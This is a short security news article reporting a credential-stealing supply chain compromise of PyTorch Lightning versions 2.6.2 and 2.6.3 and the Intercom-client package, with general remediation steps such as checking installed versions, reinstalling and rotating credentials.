PyTorch Lightning and Intercom-client hit by supply chain attacks. Malicious versions 2.6.2 and 2.6.3 steal credentials. Learn how to protect yourself and what to do if affected.
Another day, another supply chain attack. This time, it's PyTorch Lightning and Intercom-client that got hit. Threat actors managed to compromise these popular Python packages to push malicious versions that steal credentials. If you're using these libraries, you need to pay attention.
According to security firms Aikido Security, OX Security, Socket, and StepSecurity, the two malicious versions of PyTorch Lightning are 2.6.2 and 2.6.3. Both were published on April 30, 2026. The campaign is assessed to be an ongoing threat, and the attackers are getting smarter about hiding their code.
### What Happened Exactly?
The attackers didn't just add a random script. They injected credential-stealing code directly into the package's installation process. When you install the compromised version, it runs a script that looks for saved credentials in your system. Think passwords, API keys, and tokens stored in config files or environment variables.
The malicious code targets:
- Cloud service credentials (AWS, GCP, Azure)
- Database passwords
- API tokens for services like GitHub and GitLab
- SSH keys and other authentication files
This isn't a simple phishing attack. It's a sophisticated supply chain compromise that affects anyone who installs these packages without checking the hash.
### How Did They Pull This Off?
The attackers likely gained access to the maintainer's account or used a compromised CI/CD pipeline. Once inside, they pushed the malicious versions to PyPI, the official Python package repository. Since PyTorch Lightning is a popular package with millions of downloads, the impact could be massive.
Here's the scary part: the malicious code was obfuscated. It wasn't obvious at first glance. The security teams only caught it because they were monitoring package integrity. Regular users would have no idea something was wrong until it was too late.
### Who's Affected?
Anyone who installed PyTorch Lightning versions 2.6.2 or 2.6.3 between April 30 and the time the malicious versions were pulled. The same goes for Intercom-client, though the exact versions for that package haven't been fully disclosed yet.
If you're a developer, data scientist, or anyone using Python for machine learning or API integrations, you need to check your installed packages right now.
### What Should You Do?
First, don't panic. But do take action immediately.
- Check your installed packages. Run `pip list` and look for PyTorch Lightning versions 2.6.2 or 2.6.3.
- If you find them, uninstall immediately: `pip uninstall pytorch-lightning`.
- Then reinstall the latest safe version: `pip install pytorch-lightning==2.6.1` or newer.
- Rotate any credentials that might have been exposed. That means changing passwords, revoking API keys, and regenerating tokens.
- Scan your system for any suspicious processes or unauthorized access.
### Why Supply Chain Attacks Are So Dangerous
Supply chain attacks like this one are particularly nasty because they exploit trust. You install a package thinking it's safe, but it's been poisoned. The attackers don't need to trick you into clicking a link. They just need to compromise one maintainer account, and suddenly thousands of users are at risk.
This isn't an isolated incident either. We've seen similar attacks on npm, RubyGems, and other package repositories. The pattern is always the same: compromise a popular package, inject malicious code, and wait for the downloads to roll in.
### The Bottom Line
Software supply chain security isn't just a buzzword. It's a real threat that affects everyone who uses open-source packages. The PyTorch Lightning attack is a wake-up call. Always verify package integrity, use checksums, and monitor for unusual activity.
Stay safe out there. And remember: when in doubt, don't install.
